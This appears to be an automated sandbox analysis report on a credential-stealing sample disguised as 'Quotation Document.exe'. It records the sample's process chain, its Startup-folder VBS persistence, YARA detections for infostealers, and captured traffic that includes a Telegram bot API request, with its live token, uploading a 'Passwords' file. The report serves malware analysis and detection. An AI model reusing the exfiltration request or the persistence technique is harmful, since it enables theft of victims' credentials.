Nov 1, 2024 00:38:52.842931986 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 23:38:52 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bfe4f3ecd9ec018be620378e8d5c3c7b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49827	188.114.96.3	443	8080	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 23:38:47 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 23:38:47 UTC	1221	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 23:38:47 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 54802 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dz6k%2Bi2G8SOeHLbrW9%2B8VAcMElH6uwJOPWoYoJJmQVBLHGZrkgiUUUB3tOmLJH39cXt%2FvTvkmsE%2Bo5Rh3RbMpdW0t0hRJkc8QF27F0Up95MiaWUSOrRP4aSakLE%2BWwLEMLHC6pqI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db77b0cb9f44773-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1814&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1586849&cwnd=245&unsent_bytes=0&cid=f0f47d5b762b5269&ts=209&x=0"
2024-10-31 23:38:47 UTC	148	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-10-31 23:38:47 UTC	211	IN	Data Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49828	149.154.167.220	443	8080	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 23:38:53 UTC	297	OUT	POST /bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendDocument?chat_id=5679778644&caption=user%20/%20Passwords%20/%20173.254.250.77 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dcf9e3a617256d Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-10-31 23:38:53 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 63 66 39 65 33 61 36 31 37 32 35 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dcf9e3a617256dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-10-31 23:38:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 31 Oct 2024 23:38:53 GMT Content-Type: application/json Content-Length: 561 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-31 23:38:54 UTC	561	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 37 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 37 39 31 32 34 35 35 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 45 53 55 4c 54 4e 4f 56 41 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6e 75 6d 6d 65 6e 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 36 37 39 37 37 38 36 34 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 49 6e 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 79 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 49 6e 61 5f 6d 65 79 65 72 66 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 34 31 37 39 33 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":15788,"from":{"id":7479124552,"is_bot":true,"first_name":"RESULTNOVA","username":"onummenbot"},"chat":{"id":5679778644,"first_name":"Ina","last_name":"Meyer","username":"Ina_meyerfx","type":"private"},"date":1730417933,"d

Target ID:	0
Start time:	19:36:54
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\Quotation Document.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation Document.exe"
Imagebase:	0x400000
File size:	1'175'717 bytes
MD5 hash:	CD3C7F532DCFFD81361915BF691CFBD0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:37:46
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Local\emboweling\neophobia.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation Document.exe"
Imagebase:	0x400000
File size:	1'175'717 bytes
MD5 hash:	CD3C7F532DCFFD81361915BF691CFBD0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:38:43
Start date:	31/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation Document.exe"
Imagebase:	0x6e0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	19:38:54
Start date:	31/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs"
Imagebase:	0x7ff72bec0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:38:54
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Local\emboweling\neophobia.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\emboweling\neophobia.exe"
Imagebase:	0x400000
File size:	1'175'717 bytes
MD5 hash:	CD3C7F532DCFFD81361915BF691CFBD0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	47.9%
Signature Coverage:	14.4%
Total number of Nodes:	313
Total number of Limit Nodes:	33

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

4, xrefs: 00401B64
v, xrefs: 00401E4B
{, xrefs: 00401B4B
E, xrefs: 00401E0F
x, xrefs: 00402088
V, xrefs: 00402038
v, xrefs: 0040206A
{, xrefs: 00401E3C
V, xrefs: 00401E19
*, xrefs: 00401A1F
v, xrefs: 00401B5A
W, xrefs: 00402033
U, xrefs: 004020F5
., xrefs: 0040201F
!, xrefs: 004020CF
h, xrefs: 00401A6F
", xrefs: 00401B0F
4, xrefs: 00402074
4, xrefs: 00402136
x, xrefs: 00401E69
_._, xrefs: 00402257
0, xrefs: 00401BBD
D, xrefs: 00401DFB
{, xrefs: 0040205B
W, xrefs: 00401B14
W, xrefs: 00401B23
6, xrefs: 004020C5
', xrefs: 00402006
[, xrefs: 00402047
5, xrefs: 00402109
*, xrefs: 004020E1
', xrefs: 00401AF6
{, xrefs: 0040211D
., xrefs: 00401B0A
:, xrefs: 00401B28
o, xrefs: 00401B8D
o, xrefs: 00402097
!, xrefs: 00401B1E
%, xrefs: 004020FA
!, xrefs: 0040201A
[, xrefs: 00401B37
), xrefs: 0040202E
x, xrefs: 00401B78
x, xrefs: 0040214A
v, xrefs: 0040212C
o, xrefs: 00402159
W, xrefs: 004020E6
8, xrefs: 00401BA9
___, xrefs: 0040227D

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 050F7330 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON

Download Yara Rule

Strings

N, xrefs: 050FA710

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: cc49c74a82b3c4ca41230f29b6cb6fea763b26aea2c7b4cc75b69d4c3c91f489
Instruction ID: 344a5f9204967a6f0a1ae4b2caaa3904eb51e0997d44ff61de15ec711b551bd5
Opcode Fuzzy Hash: cc49c74a82b3c4ca41230f29b6cb6fea763b26aea2c7b4cc75b69d4c3c91f489
Instruction Fuzzy Hash: 9D73D531D10B5A8ECB11EF68C854A9DFBB1FF99300F15D69AE44967221EB70AAC4CF41

Function 050FBF20 Relevance: 3.5, Strings: 1, Instructions: 2260COMMON

Download Yara Rule

Strings

K, xrefs: 050FE5F3

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: f6f99cece0944c7ae04d85de789f375c5139c4318f39d60d8703e073c6f2aa8c
Instruction ID: 7cdf55419e728e8a44ff86db3bacde60b7a87802468e89d4114d9125ec458054
Opcode Fuzzy Hash: f6f99cece0944c7ae04d85de789f375c5139c4318f39d60d8703e073c6f2aa8c
Instruction Fuzzy Hash: A333E431D14B198EDB11EF68D854A9DFBB1FF99300F10D69AE54867221EB70AAC4CF81

Function 050FB850 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7aa975677eb9d4c75aa9f48b95a4b46dec078d1f417666868a461e9d3b6b92
Instruction ID: 054e0c5a58b72e88903f4daef70f20349b4278fd902168f86082d81b7e60d933
Opcode Fuzzy Hash: 6c7aa975677eb9d4c75aa9f48b95a4b46dec078d1f417666868a461e9d3b6b92
Instruction Fuzzy Hash: 62F1E474E01218CFDB14DFA9D884B9DBBB2BF88304F54C1A9E908AB355DB74A985CF50

Function 050F4648 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69a7b711c48c1769b6103a8ec89c4f41c5006c59babcc9a32b4d19fc1150bfd8
Instruction ID: 2fdbcbc5a9ed92225a0cc105cc37b188695fea484978e8c7ed7f9b669a2774d0
Opcode Fuzzy Hash: 69a7b711c48c1769b6103a8ec89c4f41c5006c59babcc9a32b4d19fc1150bfd8
Instruction Fuzzy Hash: 64C18F74E00218CFDB54DFA5D994B9DBBB2BF88301F2085A9D809A7365DB359E85CF10

Function 050F4C30 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46afeba3847b5432129cb941b2b6f5388b75fbf9b9c46ab7e2d870c23aaa2b52
Instruction ID: 2f4aa0624235079d0a70b21e1d3a96c9c4ca69ba526591971f654d3275de7117
Opcode Fuzzy Hash: 46afeba3847b5432129cb941b2b6f5388b75fbf9b9c46ab7e2d870c23aaa2b52
Instruction Fuzzy Hash: 38A10370D00208CFDB24DFA9D998BDDBBB1FF88314F249269E509AB2A1DB705985CF51

Function 050F4F7C Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 876ff55644f4493674d07611bfb3c778941030cd0d3fb1931cc89bd64007fdcb
Instruction ID: 88e9a73dfe4fc1923a8c24aead0d15d8ffdf05726fdbaaf41dc256137828e96a
Opcode Fuzzy Hash: 876ff55644f4493674d07611bfb3c778941030cd0d3fb1931cc89bd64007fdcb
Instruction Fuzzy Hash: 1891F370D00208CFDB20DFA8D988BDDBBB1FF49314F249669E509AB291DB749985CF54

Function 050F463A Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c88fa859c0913b6b289417ac1ccbf6b19388b330eee78c08c9101c2bd66c94
Instruction ID: bdf2044a5b7de68503e9aaaad9f1d2dee5097d0fc687b1f22437fa68cc2103b6
Opcode Fuzzy Hash: 76c88fa859c0913b6b289417ac1ccbf6b19388b330eee78c08c9101c2bd66c94
Instruction Fuzzy Hash: FE41D370D01248CBDB18DFAAD95479EFBF2AF88300F24D52AD819BB654DB345945CF14

Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 0040CC41
__mtinit.LIBCMT ref: 0040CC47
_fast_error_exit.LIBCMT ref: 0040CC52
__RTC_Initialize.LIBCMT ref: 0040CC58
__ioinit.LIBCMT ref: 0040CC61
__amsg_exit.LIBCMT ref: 0040CC6C
GetCommandLineA.KERNEL32 ref: 0040CC72
___crtGetEnvironmentStringsA.LIBCMT ref: 0040CC7D
__setargv.LIBCMT ref: 0040CC87
__amsg_exit.LIBCMT ref: 0040CC92
__setenvp.LIBCMT ref: 0040CC98
__amsg_exit.LIBCMT ref: 0040CCA3
__cinit.LIBCMT ref: 0040CCAB
__amsg_exit.LIBCMT ref: 0040CCB6

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
String ID:
API String ID: 2598563909-0
Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C

Function 050F62F8 Relevance: 6.6, Strings: 5, Instructions: 383
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 050F6346
8cq, xrefs: 050F6739
Hbq, xrefs: 050F6541
Hbq, xrefs: 050F64E2
TJcq, xrefs: 050F6772

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8cq$Hbq$Hbq$Hbq$TJcq
API String ID: 0-1895975235
Opcode ID: 4406b4c90e40a5d195cb5473a38354c590561a789a1196d2ec89b10d195715bc
Instruction ID: 001e38c9a6df415bb70f77656175338ede029df270e8db328ccf239236cdb40a
Opcode Fuzzy Hash: 4406b4c90e40a5d195cb5473a38354c590561a789a1196d2ec89b10d195715bc
Instruction Fuzzy Hash: 11D1E331B002048FCB15DB68D594AAE7BF6FF89320F244565E606EB7A1CA36EC45CB91

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
